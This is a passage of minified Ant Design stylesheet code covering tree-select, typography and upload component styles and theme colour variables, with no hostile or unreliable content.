8px; } .ant-select-tree-checkbox-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; } .ant-select-tree-checkbox-group-item { margin-right: 8px; } .ant-select-tree-checkbox-group-item:last-child { margin-right: 0; } .ant-select-tree-checkbox-group-item + .ant-select-tree-checkbox-group-item { margin-left: 0; } .ant-select-tree-checkbox-indeterminate .ant-select-tree-checkbox-inner { background-color: #fff; border-color: #d9d9d9; } .ant-select-tree-checkbox-indeterminate .ant-select-tree-checkbox-inner::after { top: 50%; left: 50%; width: 8px; height: 8px; background-color: var(--ant-primary-color); border: 0; transform: translate(-50%, -50%) scale(1); opacity: 1; content: ' '; } .ant-select-tree-checkbox-indeterminate.ant-select-tree-checkbox-disabled .ant-select-tree-checkbox-inner::after { background-color: rgba(0, 0, 0, 0.25); border-color: rgba(0, 0, 0, 0.25); } .ant-tree-select-dropdown { padding: 8px 4px; } .ant-tree-select-dropdown-rtl { direction: rtl; } .ant-tree-select-dropdown .ant-select-tree { border-radius: 0; } .ant-tree-select-dropdown .ant-select-tree-list-holder-inner { align-items: stretch; } .ant-tree-select-dropdown .ant-select-tree-list-holder-inner .ant-select-tree-treenode .ant-select-tree-node-content-wrapper { flex: auto; } .ant-select-tree { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; background: #fff; border-radius: 2px; transition: background-color 0.3s; } .ant-select-tree-focused:not(:hover):not(.ant-select-tree-active-focused) { background: var(--ant-primary-1); } .ant-select-tree-list-holder-inner { align-items: flex-start; } .ant-select-tree.ant-select-tree-block-node .ant-select-tree-list-holder-inner { align-items: stretch; } .ant-select-tree.ant-select-tree-block-node .ant-select-tree-list-holder-inner .ant-select-tree-node-content-wrapper { flex: auto; } .ant-select-tree.ant-select-tree-block-node .ant-select-tree-list-holder-inner .ant-select-tree-treenode.dragging { position: relative; } .ant-select-tree.ant-select-tree-block-node .ant-select-tree-list-holder-inner .ant-select-tree-treenode.dragging::after { position: absolute; top: 0; right: 0; bottom: 4px; left: 0; border: 1px solid var(--ant-primary-color); opacity: 0; -webkit-animation: ant-tree-node-fx-do-not-use 0.3s; animation: ant-tree-node-fx-do-not-use 0.3s; -webkit-animation-play-state: running; animation-play-state: running; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; content: ''; pointer-events: none; } .ant-select-tree .ant-select-tree-treenode { display: flex; align-items: flex-start; padding: 0 0 4px 0; outline: none; } .ant-select-tree .ant-select-tree-treenode-disabled .ant-select-tree-node-content-wrapper { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-select-tree .ant-select-tree-treenode-disabled .ant-select-tree-node-content-wrapper:hover { background: transparent; } .ant-select-tree .ant-select-tree-treenode-active .ant-select-tree-node-content-wrapper { background: #f5f5f5; } .ant-select-tree .ant-select-tree-treenode:not(.ant-select-tree .ant-select-tree-treenode-disabled).filter-node .ant-select-tree-title { color: inherit; font-weight: 500; } .ant-select-tree-indent { align-self: stretch; white-space: nowrap; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-select-tree-indent-unit { display: inline-block; width: 24px; } .ant-select-tree-draggable-icon { width: 24px; line-height: 24px; text-align: center; opacity: 0.2; transition: opacity 0.3s; } .ant-select-tree-treenode:hover .ant-select-tree-draggable-icon { opacity: 0.45; } .ant-select-tree-switcher { position: relative; flex: none; align-self: stretch; width: 24px; margin: 0; line-height: 24px; text-align: center; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-select-tree-switcher .ant-tree-switcher-icon, .ant-select-tree-switcher .ant-select-tree-switcher-icon { display: inline-block; font-size: 10px; vertical-align: baseline; } .ant-select-tree-switcher .ant-tree-switcher-icon svg, .ant-select-tree-switcher .ant-select-tree-switcher-icon svg { transition: transform 0.3s; } .ant-select-tree-switcher-noop { cursor: default; } .ant-select-tree-switcher_close .ant-select-tree-switcher-icon svg { transform: rotate(-90deg); } .ant-select-tree-switcher-loading-icon { color: var(--ant-primary-color); } .ant-select-tree-switcher-leaf-line { position: relative; z-index: 1; display: inline-block; width: 100%; height: 100%; } .ant-select-tree-switcher-leaf-line::before { position: absolute; top: 0; right: 12px; bottom: -4px; margin-left: -1px; border-right: 1px solid #d9d9d9; content: ' '; } .ant-select-tree-switcher-leaf-line::after { position: absolute; width: 10px; height: 14px; border-bottom: 1px solid #d9d9d9; content: ' '; } .ant-select-tree-checkbox { top: initial; margin: 4px 8px 0 0; } .ant-select-tree .ant-select-tree-node-content-wrapper { position: relative; z-index: auto; min-height: 24px; margin: 0; padding: 0 4px; color: inherit; line-height: 24px; background: transparent; border-radius: 2px; cursor: pointer; transition: all 0.3s, border 0s, line-height 0s, box-shadow 0s; } .ant-select-tree .ant-select-tree-node-content-wrapper:hover { background-color: #f5f5f5; } .ant-select-tree .ant-select-tree-node-content-wrapper.ant-select-tree-node-selected { background-color: var(--ant-primary-2); } .ant-select-tree .ant-select-tree-node-content-wrapper .ant-select-tree-iconEle { display: inline-block; width: 24px; height: 24px; line-height: 24px; text-align: center; vertical-align: top; } .ant-select-tree .ant-select-tree-node-content-wrapper .ant-select-tree-iconEle:empty { display: none; } .ant-select-tree-unselectable .ant-select-tree-node-content-wrapper:hover { background-color: transparent; } .ant-select-tree-node-content-wrapper { line-height: 24px; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-select-tree-node-content-wrapper .ant-tree-drop-indicator { position: absolute; z-index: 1; height: 2px; background-color: var(--ant-primary-color); border-radius: 1px; pointer-events: none; } .ant-select-tree-node-content-wrapper .ant-tree-drop-indicator::after { position: absolute; top: -3px; left: -6px; width: 8px; height: 8px; background-color: transparent; border: 2px solid var(--ant-primary-color); border-radius: 50%; content: ''; } .ant-select-tree .ant-select-tree-treenode.drop-container > [draggable] { box-shadow: 0 0 0 2px var(--ant-primary-color); } .ant-select-tree-show-line .ant-select-tree-indent-unit { position: relative; height: 100%; } .ant-select-tree-show-line .ant-select-tree-indent-unit::before { position: absolute; top: 0; right: 12px; bottom: -4px; border-right: 1px solid #d9d9d9; content: ''; } .ant-select-tree-show-line .ant-select-tree-indent-unit-end::before { display: none; } .ant-select-tree-show-line .ant-select-tree-switcher { background: #fff; } .ant-select-tree-show-line .ant-select-tree-switcher-line-icon { vertical-align: -0.15em; } .ant-select-tree .ant-select-tree-treenode-leaf-last .ant-select-tree-switcher-leaf-line::before { top: auto !important; bottom: auto !important; height: 14px !important; } .ant-tree-select-dropdown-rtl .ant-select-tree .ant-select-tree-switcher_close .ant-select-tree-switcher-icon svg { transform: rotate(90deg); } .ant-tree-select-dropdown-rtl .ant-select-tree .ant-select-tree-switcher-loading-icon { transform: scaleY(-1); } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-typography { color: rgba(0, 0, 0, 0.85); overflow-wrap: break-word; } .ant-typography.ant-typography-secondary { color: rgba(0, 0, 0, 0.45); } .ant-typography.ant-typography-success { color: var(--ant-success-color); } .ant-typography.ant-typography-warning { color: var(--ant-warning-color); } .ant-typography.ant-typography-danger { color: var(--ant-error-color); } a.ant-typography.ant-typography-danger:active, a.ant-typography.ant-typography-danger:focus, a.ant-typography.ant-typography-danger:hover { color: #0d0c0c; } .ant-typography.ant-typography-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } div.ant-typography, .ant-typography p { margin-bottom: 1em; } h1.ant-typography, .ant-typography h1 { margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 38px; line-height: 1.23; } h2.ant-typography, .ant-typography h2 { margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 30px; line-height: 1.35; } h3.ant-typography, .ant-typography h3 { margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 24px; line-height: 1.35; } h4.ant-typography, .ant-typography h4 { margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 20px; line-height: 1.4; } h5.ant-typography, .ant-typography h5 { margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 600; font-size: 16px; line-height: 1.5; } .ant-typography + h1.ant-typography, .ant-typography + h2.ant-typography, .ant-typography + h3.ant-typography, .ant-typography + h4.ant-typography, .ant-typography + h5.ant-typography { margin-top: 1.2em; } .ant-typography div + h1, .ant-typography ul + h1, .ant-typography li + h1, .ant-typography p + h1, .ant-typography h1 + h1, .ant-typography h2 + h1, .ant-typography h3 + h1, .ant-typography h4 + h1, .ant-typography h5 + h1, .ant-typography div + h2, .ant-typography ul + h2, .ant-typography li + h2, .ant-typography p + h2, .ant-typography h1 + h2, .ant-typography h2 + h2, .ant-typography h3 + h2, .ant-typography h4 + h2, .ant-typography h5 + h2, .ant-typography div + h3, .ant-typography ul + h3, .ant-typography li + h3, .ant-typography p + h3, .ant-typography h1 + h3, .ant-typography h2 + h3, .ant-typography h3 + h3, .ant-typography h4 + h3, .ant-typography h5 + h3, .ant-typography div + h4, .ant-typography ul + h4, .ant-typography li + h4, .ant-typography p + h4, .ant-typography h1 + h4, .ant-typography h2 + h4, .ant-typography h3 + h4, .ant-typography h4 + h4, .ant-typography h5 + h4, .ant-typography div + h5, .ant-typography ul + h5, .ant-typography li + h5, .ant-typography p + h5, .ant-typography h1 + h5, .ant-typography h2 + h5, .ant-typography h3 + h5, .ant-typography h4 + h5, .ant-typography h5 + h5 { margin-top: 1.2em; } a.ant-typography-ellipsis, span.ant-typography-ellipsis { display: inline-block; max-width: 100%; } a.ant-typography, .ant-typography a { color: var(--ant-primary-color); outline: none; cursor: pointer; transition: color 0.3s; text-decoration: none; } a.ant-typography:focus, .ant-typography a:focus, a.ant-typography:hover, .ant-typography a:hover { color: var(--ant-primary-color-hover); } a.ant-typography:active, .ant-typography a:active { color: var(--ant-primary-color-active); } a.ant-typography:active, .ant-typography a:active, a.ant-typography:hover, .ant-typography a:hover { text-decoration: none; } a.ant-typography[disabled], .ant-typography a[disabled], a.ant-typography.ant-typography-disabled, .ant-typography a.ant-typography-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } a.ant-typography[disabled]:active, .ant-typography a[disabled]:active, a.ant-typography.ant-typography-disabled:active, .ant-typography a.ant-typography-disabled:active, a.ant-typography[disabled]:hover, .ant-typography a[disabled]:hover, a.ant-typography.ant-typography-disabled:hover, .ant-typography a.ant-typography-disabled:hover { color: rgba(0, 0, 0, 0.25); } a.ant-typography[disabled]:active, .ant-typography a[disabled]:active, a.ant-typography.ant-typography-disabled:active, .ant-typography a.ant-typography-disabled:active { pointer-events: none; } .ant-typography code { margin: 0 0.2em; padding: 0.2em 0.4em 0.1em; font-size: 85%; background: rgba(150, 150, 150, 0.1); border: 1px solid rgba(100, 100, 100, 0.2); border-radius: 3px; } .ant-typography kbd { margin: 0 0.2em; padding: 0.15em 0.4em 0.1em; font-size: 90%; background: rgba(150, 150, 150, 0.06); border: 1px solid rgba(100, 100, 100, 0.2); border-bottom-width: 2px; border-radius: 3px; } .ant-typography mark { padding: 0; background-color: #ffe58f; } .ant-typography u, .ant-typography ins { text-decoration: underline; -webkit-text-decoration-skip: ink; text-decoration-skip-ink: auto; } .ant-typography s, .ant-typography del { text-decoration: line-through; } .ant-typography strong { font-weight: 600; } .ant-typography-expand, .ant-typography-edit, .ant-typography-copy { color: var(--ant-primary-color); text-decoration: none; outline: none; cursor: pointer; transition: color 0.3s; margin-left: 4px; } .ant-typography-expand:focus, .ant-typography-edit:focus, .ant-typography-copy:focus, .ant-typography-expand:hover, .ant-typography-edit:hover, .ant-typography-copy:hover { color: var(--ant-primary-color-hover); } .ant-typography-expand:active, .ant-typography-edit:active, .ant-typography-copy:active { color: var(--ant-primary-color-active); } .ant-typography-copy-success, .ant-typography-copy-success:hover, .ant-typography-copy-success:focus { color: var(--ant-success-color); } .ant-typography-edit-content { position: relative; } div.ant-typography-edit-content { left: -12px; margin-top: -5px; margin-bottom: calc(1em - 4px - 1px); } .ant-typography-edit-content-confirm { position: absolute; right: 10px; bottom: 8px; color: rgba(0, 0, 0, 0.45); pointer-events: none; } .ant-typography-edit-content textarea { /* stylelint-disable-next-line property-no-vendor-prefix */ -moz-transition: none; } .ant-typography ul, .ant-typography ol { margin: 0 0 1em; padding: 0; } .ant-typography ul li, .ant-typography ol li { margin: 0 0 0 20px; padding: 0 0 0 4px; } .ant-typography ul { list-style-type: circle; } .ant-typography ul ul { list-style-type: disc; } .ant-typography ol { list-style-type: decimal; } .ant-typography pre, .ant-typography blockquote { margin: 1em 0; } .ant-typography pre { padding: 0.4em 0.6em; white-space: pre-wrap; word-wrap: break-word; background: rgba(150, 150, 150, 0.1); border: 1px solid rgba(100, 100, 100, 0.2); border-radius: 3px; } .ant-typography pre code { display: inline; margin: 0; padding: 0; font-size: inherit; font-family: inherit; background: transparent; border: 0; } .ant-typography blockquote { padding: 0 0 0 0.6em; border-left: 4px solid rgba(100, 100, 100, 0.2); opacity: 0.85; } .ant-typography-single-line { white-space: nowrap; } .ant-typography-ellipsis-single-line { overflow: hidden; text-overflow: ellipsis; } a.ant-typography-ellipsis-single-line, span.ant-typography-ellipsis-single-line { vertical-align: bottom; } .ant-typography-ellipsis-multiple-line { /* stylelint-disable-next-line value-no-vendor-prefix */ display: -webkit-box; overflow: hidden; -webkit-line-clamp: 3; /*! autoprefixer: ignore next */ -webkit-box-orient: vertical; } .ant-typography-rtl { direction: rtl; } .ant-typography-rtl .ant-typography-expand, .ant-typography-rtl .ant-typography-edit, .ant-typography-rtl .ant-typography-copy { margin-right: 4px; margin-left: 0; } .ant-typography-rtl .ant-typography-expand { float: left; } div.ant-typography-edit-content.ant-typography-rtl { right: -12px; left: auto; } .ant-typography-rtl .ant-typography-edit-content-confirm { right: auto; left: 10px; } .ant-typography-rtl.ant-typography ul li, .ant-typography-rtl.ant-typography ol li { margin: 0 20px 0 0; padding: 0 4px 0 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-upload { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; outline: 0; } .ant-upload p { margin: 0; } .ant-upload-btn { display: block; width: 100%; outline: none; } .ant-upload input[type='file'] { cursor: pointer; } .ant-upload.ant-upload-select { display: inline-block; } .ant-upload.ant-upload-disabled { cursor: not-allowed; } .ant-upload.ant-upload-select-picture-card { width: 104px; height: 104px; margin-right: 8px; margin-bottom: 8px; text-align: center; vertical-align: top; background-color: #fafafa; border: 1px dashed #d9d9d9; border-radius: 2px; cursor: pointer; transition: border-color 0.3s; } .ant-upload.ant-upload-select-picture-card > .ant-upload { display: flex; align-items: center; justify-content: center; height: 100%; text-align: center; } .ant-upload.ant-upload-select-picture-card:hover { border-color: var(--ant-primary-color); } .ant-upload-disabled.ant-upload.ant-upload-select-picture-card:hover { border-color: #d9d9d9; } .ant-upload.ant-upload-drag { position: relative; width: 100%; height: 100%; text-align: center; background: #fafafa; border: 1px dashed #d9d9d9; border-radius: 2px; cursor: pointer; transition: border-color 0.3s; } .ant-upload.ant-upload-drag .ant-upload { padding: 16px 0; } .ant-upload.ant-upload-drag.ant-upload-drag-hover:not(.ant-upload-disabled) { border-color: var(--ant-primary-7); } .ant-upload.ant-upload-drag.ant-upload-disabled { cursor: not-allowed; } .ant-upload.ant-upload-drag .ant-upload-btn { display: table; height: 100%; } .ant-upload.ant-upload-drag .ant-upload-drag-container { display: table-cell; vertical-align: middle; } .ant-upload.ant-upload-drag:not(.ant-upload-disabled):hover { border-color: var(--ant-primary-5); } .ant-upload.ant-upload-drag p.ant-upload-drag-icon { margin-bottom: 20px; } .ant-upload.ant-upload-drag p.ant-upload-drag-icon .anticon { color: var(--ant-primary-5); font-size: 48px; } .ant-upload.ant-upload-drag p.ant-upload-text { margin: 0 0 4px; color: rgba(0, 0, 0, 0.85); font-size: 16px; } .ant-upload.ant-upload-drag p.ant-upload-hint { color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-upload.ant-upload-drag .anticon-plus { color: rgba(0, 0, 0, 0.25); font-size: 30px; transition: all 0.3s; } .ant-upload.ant-upload-drag .anticon-plus:hover { color: rgba(0, 0, 0, 0.45); } .ant-upload.ant-upload-drag:hover .anticon-plus { color: rgba(0, 0, 0, 0.45); } .ant-upload-picture-card-wrapper { display: inline-block; width: 100%; } .ant-upload-picture-card-wrapper::before { display: table; content: ''; } .ant-upload-picture-card-wrapper::after { display: table; clear: both; content: ''; } .ant-upload-list { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; list-style: none; font-feature-settings: 'tnum'; line-height: 1.5715; } .ant-upload-list::before { display: table; content: ''; } .ant-upload-list::after { display: table; clear: both; content: ''; } .ant-upload-list-item { position: relative; height: 22.001px; margin-top: 8px; font-size: 14px; } .ant-upload-list-item-name { display: inline-block; width: 100%; padding-left: 22px; overflow: hidden; line-height: 1.5715; white-space: nowrap; text-overflow: ellipsis; } .ant-upload-list-item-card-actions { position: absolute; right: 0; } .ant-upload-list-item-card-actions-btn { opacity: 0; } .ant-upload-list-item-card-actions-btn.ant-btn-sm { height: 20px; line-height: 1; } .ant-upload-list-item-card-actions.picture { top: 22px; line-height: 0; } .ant-upload-list-item-card-actions-btn:focus, .ant-upload-list-item-card-actions.picture .ant-upload-list-item-card-actions-btn { opacity: 1; } .ant-upload-list-item-card-actions .anticon { color: rgba(0, 0, 0, 0.45); } .ant-upload-list-item-info { height: 100%; padding: 0 4px; transition: background-color 0.3s; } .ant-upload-list-item-info > span { display: block; width: 100%; height: 100%; } .ant-upload-list-item-info .anticon-loading .anticon, .ant-upload-list-item-info .ant-upload-text-icon .anticon { position: absolute; top: 5px; color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-upload-list-item .anticon-close { position: absolute; top: 6px; right: 4px; color: rgba(0, 0, 0, 0.45); font-size: 10px; line-height: 0; cursor: pointer; opacity: 0; transition: all 0.3s; } .ant-upload-list-item .anticon-close:hover { color: rgba(0, 0, 0, 0.85); } .ant-upload-list-item:hover .ant-upload-list-item-info { background-color: #f5f5f5; } .ant-upload-list-item:hover .anticon-close { opacity: 1; } .ant-upload-list-item:hover .ant-upload-list-item-card-actions-btn { opacity: 1; } .ant-upload-list-item-error, .ant-upload-list-item-error .ant-upload-text-icon > .anticon, .ant-upload-list-item-error .ant-upload-list-item-name { color: var(--ant-error-color); } .ant-upload-list-item-error .ant-upload-list-item-card-actions .anticon { color: var(--ant-error-color); } .ant-upload-list-item-error .ant-upload-list-item-card-actions-btn { opacity: 1; } .ant-upload-list-item-progress { position: absolute; bottom: -12px; width: 100%; padding-left: 26px; font-size: 14px; line-height: 0; } .ant-upload-list-picture .ant-upload-list-item, .ant-upload-list-picture-card .ant-upload-list-item { position: relative; height: 66px; padding: 8px; border: 1px solid #d9d9d9; border-radius: 2px; } .ant-upload-list-picture .ant-upload-list-item:hover, .ant-upload-list-picture-card .ant-upload-list-item:hover { background: transparent; } .ant-upload-list-picture .ant-upload-list-item-error, .ant-upload-list-picture-card .ant-upload-list-item-error { border-color: var(--ant-error-color); } .ant-upload-list-picture .ant-upload-list-item-info, .ant-upload-list-picture-card .ant-upload-list-item-info { padding: 0; } .ant-upload-list-picture .ant-upload-list-item:hover .ant-upload-list-item-info, .ant-upload-list-picture-card .ant-upload-list-item:hover .ant-upload-list-item-info { background: transparent; } .ant-upload-list-picture .ant-upload-list-item-uploading, .ant-upload-list-picture-card .ant-upload-list-item-uploading { border-style: dashed; } .ant-upload-list-picture .ant-upload-list-item-thumbnail, .ant-upload-list-picture-card .ant-upload-list-item-thumbnail { width: 48px; height: 48px; line-height: 60px; text-align: center; opacity: 0.8; } .ant-upload-list-picture .ant-upload-list-item-thumbnail .anticon, .ant-upload-list-picture-card .ant-upload-list-item-thumbnail .anticon { font-size: 26px; } .ant-upload-list-picture .ant-upload-list-item-error .ant-upload-list-item-thumbnail .anticon svg path[fill='#e6f7ff'], .ant-upload-list-picture-card .ant-upload-list-item-error .ant-upload-list-item-thumbnail .anticon svg path[fill='#e6f7ff'] { fill: var(--ant-error-color-deprecated-bg); } .ant-upload-list-picture .ant-upload-list-item-error .ant-upload-list-item-thumbnail .anticon svg path[fill='#1890ff'], .ant-upload-list-picture-card .ant-upload-list-item-error .ant-upload-list-item-thumbnail .anticon svg path[fill='#1890ff'] { fill: var(--ant-error-color); } .ant-upload-list-picture .ant-upload-list-item-icon, .ant-upload-list-picture-card .ant-upload-list-item-icon { position: absolute; top: 50%; left: 50%; font-size: 26px; transform: translate(-50%, -50%); } .ant-upload-list-picture .ant-upload-list-item-icon .anticon, .ant-upload-list-picture-card .ant-upload-list-item-icon .anticon { font-size: 26px; } .ant-upload-list-picture .ant-upload-list-item-image, .ant-upload-list-picture-card .ant-upload-list-item-image { max-width: 100%; } .ant-upload-list-picture .ant-upload-list-item-thumbnail img, .ant-upload-list-picture-card .ant-upload-list-item-thumbnail img { display: block; width: 48px; height: 48px; overflow: hidden; } .ant-upload-list-picture .ant-upload-list-item-name, .ant-upload-list-picture-card .ant-upload-list-item-name { display: inline-block; box-sizing: border-box; max-width: 100%; margin: 0 0 0 8px; padding-right: 8px; padding-left: 48px; overflow: hidden; line-height: 44px; white-space: nowrap; text-overflow: ellipsis; transition: all 0.3s; } .ant-upload-list-picture .ant-upload-list-item-uploading .ant-upload-list-item-name, .ant-upload-list-picture-card .ant-upload-list-item-uploading .ant-upload-list-item-name { margin-bottom: 12px; } .ant-upload-list-picture .ant-upload-list-item-progress, .ant-upload-list-picture-card .ant-upload-list-item-progress { bottom: 14px; width: calc(100% - 24px); margin-top: 0; padding-left: 56px; } .ant-upload-list-picture .anticon-close, .ant-upload-list-picture-card .anticon-close { position: absolute; top: 8px; right: 8px; line-height: 1; opacity: 1; } .ant-upload-list-picture-card-container { display: inline-block; width: 104px; height: 104px; margin: 0 8px 8px 0; vertical-align: top; } .ant-upload-list-picture-card.ant-upload-list::after { display: none; } .ant-upload-list-picture-card .ant-upload-list-item { height: 100%; margin: 0; } .ant-upload-list-picture-card .ant-upload-list-item-info { position: relative; height: 100%; overflow: hidden; } .ant-upload-list-picture-card .ant-upload-list-item-info::before { position: absolute; z-index: 1; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); opacity: 0; transition: all 0.3s; content: ' '; } .ant-upload-list-picture-card .ant-upload-list-item:hover .ant-upload-list-item-info::before { opacity: 1; } .ant-upload-list-picture-card .ant-upload-list-item-actions { position: absolute; top: 50%; left: 50%; z-index: 10; white-space: nowrap; transform: translate(-50%, -50%); opacity: 0; transition: all 0.3s; } .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-eye, .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-download, .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-delete { z-index: 10; width: 16px; margin: 0 4px; color: rgba(255, 255, 255, 0.85); font-size: 16px; cursor: pointer; transition: all 0.3s; } .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-eye:hover, .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-download:hover, .ant-upload-list-picture-card .ant-upload-list-item-actions .anticon-delete:hover { color: #fff; } .ant-upload-list-picture-card .ant-upload-list-item-info:hover + .ant-upload-list-item-actions, .ant-upload-list-picture-card .ant-upload-list-item-actions:hover { opacity: 1; } .ant-upload-list-picture-card .ant-upload-list-item-thumbnail, .ant-upload-list-picture-card .ant-upload-list-item-thumbnail img { position: static; display: block; width: 100%; height: 100%; -o-object-fit: contain; object-fit: contain; } .ant-upload-list-picture-card .ant-upload-list-item-name { display: none; margin: 8px 0 0; padding: 0; line-height: 1.5715; text-align: center; } .ant-upload-list-picture-card .ant-upload-list-item-file + .ant-upload-list-item-name { position: absolute; bottom: 10px; display: block; } .ant-upload-list-picture-card .ant-upload-list-item-uploading.ant-upload-list-item { background-color: #fafafa; } .ant-upload-list-picture-card .ant-upload-list-item-uploading .ant-upload-list-item-info { height: auto; } .ant-upload-list-picture-card .ant-upload-list-item-uploading .ant-upload-list-item-info::before, .ant-upload-list-picture-card .ant-upload-list-item-uploading .ant-upload-list-item-info .anticon-eye, .ant-upload-list-picture-card .ant-upload-list-item-uploading .ant-upload-list-item-info .anticon-delete { display: none; } .ant-upload-list-picture-card .ant-upload-list-item-progress { bottom: 32px; width: calc(100% - 14px); padding-left: 0; } .ant-upload-list-text-container, .ant-upload-list-picture-container { transition: opacity 0.3s, height 0.3s; } .ant-upload-list-text-container::before, .ant-upload-list-picture-container::before { display: table; width: 0; height: 0; content: ''; } .ant-upload-list-text-container .ant-upload-span, .ant-upload-list-picture-container .ant-upload-span { display: block; flex: auto; } .ant-upload-list-text .ant-upload-span, .ant-upload-list-picture .ant-upload-span { display: flex; align-items: center; } .ant-upload-list-text .ant-upload-span > *, .ant-upload-list-picture .ant-upload-span > * { flex: none; } .ant-upload-list-text .ant-upload-list-item-name, .ant-upload-list-picture .ant-upload-list-item-name { flex: auto; margin: 0; padding: 0 8px; } .ant-upload-list-text .ant-upload-list-item-card-actions, .ant-upload-list-picture .ant-upload-list-item-card-actions { position: static; } .ant-upload-list-text .ant-upload-text-icon .anticon { position: static; } .ant-upload-list .ant-upload-animate-inline-appear, .ant-upload-list .ant-upload-animate-inline-enter, .ant-upload-list .ant-upload-animate-inline-leave { -webkit-animation-duration: 0.3s; animation-duration: 0.3s; -webkit-animation-fill-mode: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-fill-mode: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-upload-list .ant-upload-animate-inline-appear, .ant-upload-list .ant-upload-animate-inline-enter { 